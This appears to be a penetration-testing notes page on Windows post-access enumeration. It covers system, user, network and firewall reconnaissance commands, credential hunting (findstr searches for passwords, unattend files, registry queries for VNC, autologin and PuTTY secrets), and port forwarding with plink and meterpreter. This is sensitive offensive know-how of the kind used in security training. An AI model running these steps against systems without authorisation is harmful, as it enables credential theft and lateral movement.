Initial Enumeration

System Enumeration

systeminfo

systeminfo | findstr /b /c:"OS Name" /c:"OS Version" /c:"System Type"

Enumerating Quick Fixes

wmic qfe

wmic qfe get Caption,Description,HotFixID,InstalledOn

Enumerate Drives

wmic logicaldisk

wmic logicaldisk get caption,description,providername

User Enumeration

whoami

Current User Privileges

whoami /priv

Current User Groups

whoami /groups

Users on Current Machine

net user

Details about a single user including group memberships

net user Administrator

Enumerate Groups

net localgroup

Check the members of a group

net localgroup administrators

Network Enumeration

ipconfig /all

Check arp table

arp -a

Check Routing Table

route print

Check Open Ports

netstat -ano

AV and Firewall Enumeration

sc query windefend

List all services

sc queryex type= service

This lists all active services on the machine, including their process IDs (PIDs) and status. We can manually check if some antivirus is running on target.

Firewall Enumeration

netsh advfirewall firewall dump

Displays or "dumps" the entire current configuration and rule set of the Windows Defender Firewall.

If it does not work use the older command.

netsh firewall show state

netsh: A command-line utility that allows you to display or modify the network configuration of a computer that is currently running.
firewall: Enters the context for managing the Windows Firewall.
show state: Specifically requests the current operational status of the firewall.

netsh firewall show config

Cleartext Passwords

Search for them

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*

In Files

These are common files to find them in. They might be base64-encoded. So look out for that.

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini

In Registry

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Service only available from inside

Sometimes there are services that are only accessible from inside the network. For example a MySQL server might not be accessible from the outside, for security reasons. It is also common to have different administration applications that is only accessible from inside the network/machine. Like a printer interface, or something like that. These services might be more vulnerable since they are not meant to be seen from the outside.

netstat -ano

Example output:

Proto  Local address      Remote address     State        User  Inode  PID/Program name
    -----  -------------      --------------     -----        ----  -----  ----------------
    tcp    0.0.0.0:21         0.0.0.0:*          LISTEN       0     0      -
    tcp    0.0.0.0:5900       0.0.0.0:*          LISTEN       0     0      -
    tcp    0.0.0.0:6532       0.0.0.0:*          LISTEN       0     0      -
    tcp    192.168.1.9:139    0.0.0.0:*          LISTEN       0     0      -
    tcp    192.168.1.9:139    192.168.1.9:32874  TIME_WAIT    0     0      -
    tcp    192.168.1.9:445    192.168.1.9:40648  ESTABLISHED  0     0      -
    tcp    192.168.1.9:1166   192.168.1.9:139    TIME_WAIT    0     0      -
    tcp    192.168.1.9:27900  0.0.0.0:*          LISTEN       0     0      -
    tcp    127.0.0.1:445      127.0.0.1:1159     ESTABLISHED  0     0      -
    tcp    127.0.0.1:27900    0.0.0.0:*          LISTEN       0     0      -
    udp    0.0.0.0:135        0.0.0.0:*                       0     0      -
    udp    192.168.1.9:500    0.0.0.0:*                       0     0      -

Look for LISTENING/LISTEN. Compare that to the scan you did from the outside. Does it contain any ports that are not accessible from the outside?

If that is the case, maybe you can make a remote forward to access it.

# Port forward using plink
plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.1.101

So how should we interpret the netstat output?

Local address 0.0.0.0 Local address 0.0.0.0 means that the service is listening on all interfaces. This means that it can receive a connection from the network card, from the loopback interface or any other interface. This means that anyone can connect to it.

Local address 127.0.0.1 Local address 127.0.0.1 means that the service is only listening for connection from the your PC. Not from the internet or anywhere else. This is interesting to us!

Local address 192.168.1.9 Local address 192.168.1.9 means that the service is only listening for connections from the local network. So someone in the local network can connect to it, but not someone from the internet. This is also interesting to us!

PreviousWindows Priv esc NextAutomated Enumeration Tools

Last updated 24 days ago

hashtagSystem Enumeration

hashtagEnumerating Quick Fixes

hashtagEnumerate Drives

hashtagUser Enumeration

hashtagCurrent User Privileges

hashtagCurrent User Groups

hashtagUsers on Current Machine

hashtagDetails about a single user including group memberships

hashtagEnumerate Groups

hashtagCheck the members of a group

hashtagNetwork Enumeration

hashtagCheck arp table

hashtagCheck Routing Table

hashtagCheck Open Ports

hashtagAV and Firewall Enumeration

hashtagList all services

hashtagFirewall Enumeration

hashtagCleartext Passwords

hashtagSearch for them

hashtagIn Files

hashtagIn Registry

hashtagService only available from inside